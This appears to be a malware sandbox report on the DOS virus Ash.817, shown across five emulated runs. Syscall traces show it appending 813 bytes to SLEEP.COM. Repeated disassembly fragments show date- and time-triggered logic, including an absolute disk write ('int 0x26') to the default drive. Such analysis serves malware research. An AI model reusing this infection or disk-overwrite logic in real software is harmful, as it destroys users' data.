Sample viewer

vx.netlux.org/Virus.DOS.Ash.817

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:23:13.790666094Z 26 PC: 1416d | Set disk transfer address
2018-12-17T22:23:13.799979377Z 78 PC: 141c6 | Find first file
2018-12-17T22:23:13.806001611Z 61 PC: 141d2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:23:13.812362887Z 63 PC: 141e1 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:23:13.818011743Z 66 PC: 141fa | Move file pointer
2018-12-17T22:23:13.819365302Z 64 PC: 1420f | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:23:13.822232379Z 64 PC: 14111 | Write file or device (Write 813 bytes on handle 5)
2018-12-17T22:23:13.837654187Z 66 PC: 14233 | Move file pointer
2018-12-17T22:23:13.838993727Z 64 PC: 14255 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:23:13.845287066Z 62 PC: 141ba | Close file
2018-12-17T22:23:13.853974621Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.856650212Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.858996357Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.862228655Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.864318154Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.866678707Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.869907973Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.872530716Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.87458083Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.881283581Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.883277525Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.885650497Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.88798241Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.890273272Z 61 PC: 141d2 | Open file (Filename = '')
2018-12-17T22:23:13.891740732Z 79 PC: 141c6 | Find next file
2018-12-17T22:23:13.893686915Z 59 PC: 14288 | Change current directory
2018-12-17T22:23:13.896617372Z 42 PC: 14297 | Get date 0x14297: cmp dl, 6
0x1429a: jne 0x142a1
0x1429c: xor ax, ax
0x1429e: jmp 0x142bf
0x142a0: nop
0x142a1: mov ah, 0x2c
0x142a3: int 0x21
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
2018-12-17T22:23:13.898162929Z 44 PC: 142a5 | Get time 0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
0x142bf: mov dx, ax
0x142c1: mov cx, 1
0x142c4: xor bx, bx
0x142c6: mov ah, 0x19
0x142c8: int 0x21
0x142ca: int 0x26
0x142cc: mov bx, 0x3d2
2018-12-17T22:23:13.900166579Z 44 PC: 142d3 | Get time 0x142d3: inc dh
0x142d5: cmp dh, byte ptr [0x3d6]
0x142d9: jl 0x142e1
0x142db: sub dh, byte ptr [0x3d6]
0x142df: jmp 0x142d5
0x142e1: mov al, dh
0x142e3: mov cl, al
0x142e5: cwde
0x142e6: shl ax, 1
0x142e8: add bx, ax
0x142ea: mov si, word ptr [bx]
0x142ec: mov ch, byte ptr [si - 1]
0x142ef: mov dx, si
0x142f1: mov ah, 9
0x142f3: int 0x21
0x142f5: cmp ch, 0
0x142f8: je 0x14323
0x142fa: cmp ch, 1
0x142fd: je 0x142fd
0x142ff: cmp ch, 2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4067,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:56.560659942Z 26 PC: 1416d | Set disk transfer address
2018-12-25T11:50:56.562660755Z 78 PC: 141c6 | Find first file
2018-12-25T11:50:56.56847881Z 61 PC: 141d2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:56.575119531Z 63 PC: 141e1 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:50:56.582083709Z 66 PC: 141fa | Move file pointer
2018-12-25T11:50:56.583556282Z 64 PC: 1420f | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:56.586463486Z 64 PC: 14111 | Write file or device (Write 813 bytes on handle 5)
2018-12-25T11:50:56.601963448Z 66 PC: 14233 | Move file pointer
2018-12-25T11:50:56.60370947Z 64 PC: 14255 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:56.611114039Z 62 PC: 141ba | Close file
2018-12-25T11:50:56.61968265Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.622438173Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.624537699Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.628182664Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.63096263Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.633482193Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.635679493Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.639296198Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.641526055Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.644391415Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.647623974Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.650167259Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.652443243Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.655900057Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.658285782Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.661252717Z 59 PC: 14288 | Change current directory
2018-12-25T11:50:56.666363528Z 42 PC: 14297 | Get date 0x14297: cmp dl, 6
0x1429a: jne 0x142a1
0x1429c: xor ax, ax
0x1429e: jmp 0x142bf
0x142a0: nop
0x142a1: mov ah, 0x2c
0x142a3: int 0x21
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
2018-12-25T11:50:56.668837235Z 44 PC: 142a5 | Get time 0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
0x142bf: mov dx, ax
0x142c1: mov cx, 1
0x142c4: xor bx, bx
0x142c6: mov ah, 0x19
0x142c8: int 0x21
0x142ca: int 0x26
0x142cc: mov bx, 0x3d2
2018-12-25T11:50:56.671324143Z 25 PC: 142ca | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4067,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:56.69872525Z 26 PC: 1416d | Set disk transfer address
2018-12-25T11:50:56.700375781Z 78 PC: 141c6 | Find first file
2018-12-25T11:50:56.706183351Z 61 PC: 141d2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:56.726683074Z 63 PC: 141e1 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:50:56.733849367Z 66 PC: 141fa | Move file pointer
2018-12-25T11:50:56.735280283Z 64 PC: 1420f | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:56.738462163Z 64 PC: 14111 | Write file or device (Write 813 bytes on handle 5)
2018-12-25T11:50:56.755142962Z 66 PC: 14233 | Move file pointer
2018-12-25T11:50:56.758534035Z 64 PC: 14255 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:56.765352618Z 62 PC: 141ba | Close file
2018-12-25T11:50:56.775259991Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.778260755Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.780715085Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.783842806Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.78692513Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.789714183Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.798392076Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.801831196Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.804918814Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.807608843Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.810565093Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.813125708Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.815251475Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.818444859Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:56.820621506Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:56.822887816Z 59 PC: 14288 | Change current directory
2018-12-25T11:50:56.827740126Z 42 PC: 14297 | Get date 0x14297: cmp dl, 6
0x1429a: jne 0x142a1
0x1429c: xor ax, ax
0x1429e: jmp 0x142bf
0x142a0: nop
0x142a1: mov ah, 0x2c
0x142a3: int 0x21
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
2018-12-25T11:50:56.830338064Z 44 PC: 142a5 | Get time 0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
0x142bf: mov dx, ax
0x142c1: mov cx, 1
0x142c4: xor bx, bx
0x142c6: mov ah, 0x19
0x142c8: int 0x21
0x142ca: int 0x26
0x142cc: mov bx, 0x3d2
2018-12-25T11:50:56.832539782Z 25 PC: 142ca | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":8,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4067,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:57.006771194Z 26 PC: 1416d | Set disk transfer address
2018-12-25T11:50:57.009793866Z 78 PC: 141c6 | Find first file
2018-12-25T11:50:57.015523752Z 61 PC: 141d2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:57.021756748Z 63 PC: 141e1 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:50:57.028727397Z 66 PC: 141fa | Move file pointer
2018-12-25T11:50:57.030735212Z 64 PC: 1420f | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:57.034528473Z 64 PC: 14111 | Write file or device (Write 813 bytes on handle 5)
2018-12-25T11:50:57.054767633Z 66 PC: 14233 | Move file pointer
2018-12-25T11:50:57.057230811Z 64 PC: 14255 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:57.066863113Z 62 PC: 141ba | Close file
2018-12-25T11:50:57.076813316Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.078683232Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.080200756Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.082084475Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.083956981Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.085687992Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.087182654Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.089421135Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.090939353Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.092629516Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.094649545Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.09631972Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.097766475Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.100118505Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.101708834Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.103570484Z 59 PC: 14288 | Change current directory
2018-12-25T11:50:57.106989486Z 42 PC: 14297 | Get date 0x14297: cmp dl, 6
0x1429a: jne 0x142a1
0x1429c: xor ax, ax
0x1429e: jmp 0x142bf
0x142a0: nop
0x142a1: mov ah, 0x2c
0x142a3: int 0x21
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
2018-12-25T11:50:57.109569304Z 44 PC: 142a5 | Get time 0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
0x142bf: mov dx, ax
0x142c1: mov cx, 1
0x142c4: xor bx, bx
0x142c6: mov ah, 0x19
0x142c8: int 0x21
0x142ca: int 0x26
0x142cc: mov bx, 0x3d2
2018-12-25T11:50:57.112323449Z 44 PC: 142d3 | Get time 0x142d3: inc dh
0x142d5: cmp dh, byte ptr [0x3d6]
0x142d9: jl 0x142e1
0x142db: sub dh, byte ptr [0x3d6]
0x142df: jmp 0x142d5
0x142e1: mov al, dh
0x142e3: mov cl, al
0x142e5: cwde
0x142e6: shl ax, 1
0x142e8: add bx, ax
0x142ea: mov si, word ptr [bx]
0x142ec: mov ch, byte ptr [si - 1]
0x142ef: mov dx, si
0x142f1: mov ah, 9
0x142f3: int 0x21
0x142f5: cmp ch, 0
0x142f8: je 0x14323
0x142fa: cmp ch, 1
0x142fd: je 0x142fd
0x142ff: cmp ch, 2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":8,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4067,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:50:57.350004144Z 26 PC: 1416d | Set disk transfer address
2018-12-25T11:50:57.352320308Z 78 PC: 141c6 | Find first file
2018-12-25T11:50:57.357649534Z 61 PC: 141d2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:57.363863663Z 63 PC: 141e1 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:50:57.37084602Z 66 PC: 141fa | Move file pointer
2018-12-25T11:50:57.372373193Z 64 PC: 1420f | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:57.375378194Z 64 PC: 14111 | Write file or device (Write 813 bytes on handle 5)
2018-12-25T11:50:57.389746681Z 66 PC: 14233 | Move file pointer
2018-12-25T11:50:57.400527223Z 64 PC: 14255 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:57.407360342Z 62 PC: 141ba | Close file
2018-12-25T11:50:57.416442403Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.419899561Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.422430758Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.425281548Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.42885755Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.43171051Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.434210534Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.439189987Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.441643477Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.444463509Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.447914989Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.450835139Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.453418939Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.457402797Z 61 PC: 141d2 | Open file (See above)
2018-12-25T11:50:57.459926398Z 79 PC: 141c6 | Find next file (See above)
2018-12-25T11:50:57.462918805Z 59 PC: 14288 | Change current directory
2018-12-25T11:50:57.467369651Z 42 PC: 14297 | Get date 0x14297: cmp dl, 6
0x1429a: jne 0x142a1
0x1429c: xor ax, ax
0x1429e: jmp 0x142bf
0x142a0: nop
0x142a1: mov ah, 0x2c
0x142a3: int 0x21
0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
2018-12-25T11:50:57.469430371Z 44 PC: 142a5 | Get time 0x142a5: or cl, cl
0x142a7: jne 0x142cc
0x142a9: cmp ch, 8
0x142ac: jge 0x142cc
0x142ae: add cl, ch
0x142b0: mov ax, cx
0x142b2: cwde
0x142b3: add al, dh
0x142b5: adc al, dl
0x142b7: adc ah, 0
0x142ba: or ax, ax
0x142bc: jne 0x142bf
0x142be: inc ax
0x142bf: mov dx, ax
0x142c1: mov cx, 1
0x142c4: xor bx, bx
0x142c6: mov ah, 0x19
0x142c8: int 0x21
0x142ca: int 0x26
0x142cc: mov bx, 0x3d2
2018-12-25T11:50:57.471624385Z 44 PC: 142d3 | Get time 0x142d3: inc dh
0x142d5: cmp dh, byte ptr [0x3d6]
0x142d9: jl 0x142e1
0x142db: sub dh, byte ptr [0x3d6]
0x142df: jmp 0x142d5
0x142e1: mov al, dh
0x142e3: mov cl, al
0x142e5: cwde
0x142e6: shl ax, 1
0x142e8: add bx, ax
0x142ea: mov si, word ptr [bx]
0x142ec: mov ch, byte ptr [si - 1]
0x142ef: mov dx, si
0x142f1: mov ah, 9
0x142f3: int 0x21
0x142f5: cmp ch, 0
0x142f8: je 0x14323
0x142fa: cmp ch, 1
0x142fd: je 0x142fd
0x142ff: cmp ch, 2